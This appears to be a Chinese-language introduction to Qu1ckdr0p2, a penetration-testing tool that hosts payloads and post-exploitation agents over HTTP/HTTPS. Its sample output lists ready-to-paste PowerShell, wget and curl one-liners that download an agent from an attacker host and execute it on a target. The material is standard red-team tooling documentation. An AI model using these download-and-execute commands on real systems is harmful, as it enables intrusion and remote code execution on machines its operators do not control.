關于Qu1ckdr0p2

Qu1ckdr0p2是一款功能強大的文件托管工具,在該工具的幫助下,廣大研究人員可以快速通過HTTP或HTTPS托管包括Payload和后滲透代碼在內的任何文件。

Qu1ckdr0p2提供了別名和搜索功能,相關功能模塊位于qu1ckdr0p2-tools庫中。默認配置下,使用--https選項時該工具將生成一個自簽名證書,,當Web服務器運行時,tun0接口會被優先使用,否則它將使用eth0接口。

common.ini文件中定義了--search和-u選項中需要使用的映射別名。

當網絡服務器運行時,屏幕上會打印出幾個下載地址,廣大研究人員可以直接復制和粘貼使用。

工具安裝

注意:當前版本的Qu1ckdr0p2僅支持通過pip工具進行安裝,如果你直接將該項目源碼克隆至本地的話,可能會出現一些意外問題。

首先,我們需要在本地設備上安裝并配置好Python 3環境。接下來,直接使用pip3工具安裝Qu1ckdr0p2:

pip3 install qu1ckdr0p2

 

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc

source ~/.zshrc

或者:

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc

source ~/.bashrc

 

serv init --update

工具使用

在當前工作目錄下托管一個單獨的文件:

$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080

工具更新和幫助信息:

$ serv --help            

Usage: serv [OPTIONS] COMMAND [ARGS]...

 

  Welcome to qu1ckdr0p2 entry point.

 

Options:

  --debug  啟用調試模式

  --help   顯示工具幫助信息和退出

 

Commands:

  init    執行更新

  serve  托管文件
$ serv serve --help

Usage: serv serve [OPTIONS]

 

  Serve files.

 

Options:

  -l, --list            查看別名

  -s, --search TEXT   搜索別名

  -u, --use INTEGER  使用動態數字作為別名

  -f, --file FILE        托管一個文件

  --http INTEGER     使用HTTP+自定義端口

  --https INTEGER    使用HTTPS+自定義端口

  -h, --help          顯示幫助信息和退出
$ serv init --help       

Usage: serv init [OPTIONS]

 

  Perform updates.

 

Options:

  --update            檢查并下載缺失的工具組件

  --update-self        使用pip更新工具

  --update-self-test    使用開發測試,將安裝不穩定的工具組件

  --help               顯示幫助信息和退出

工具更新命令:

$ serv init --update
$ serv init --update-self

從映射別名托管一個文件

-u選項要設置的映射別名數字是動態的,因此我們不需要記住指定的數字或輸入工具名稱:

$ serv serve --search ligolo               

 

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe

[→] Alias: ligolo_agent_win

[→] Use: 1

 

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe

[→] Alias: ligolo_proxy_win

[→] Use: 2

 

[→] Path: ~/.qu1ckdr0p2/linux/agent

[→] Alias: ligolo_agent_linux

[→] Use: 3

 

[→] Path: ~/.qu1ckdr0p2/linux/proxy

[→] Alias: ligolo_proxy_linux

[→] Use: 4

(...)
$ serv serve --search ligolo -u 3 --http 80

 

[→] Serving: ../../.qu1ckdr0p2/linux/agent

[→] Protocol: http

[→] IP address: 192.168.1.5

[→] Port: 80

[→] Interface: eth0

[→] CTRL+C to quit

 

[→] URL: http://192.168.1.5:80/agent

 

[↓] csharp:

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

 

[↓] wget:

wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

 

[↓] curl:

curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

 

[↓] powershell:

Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

 

? Web server running

工具運行截圖






許可證協議

本項目的開發與發布遵循MIT開源許可證協議。

項目地址

Qu1ckdr0p2:https://github.com/byinarie/qu1ckdr0p2

參考資料

https://github.com/byinarie/qu1ckdr0p2-tools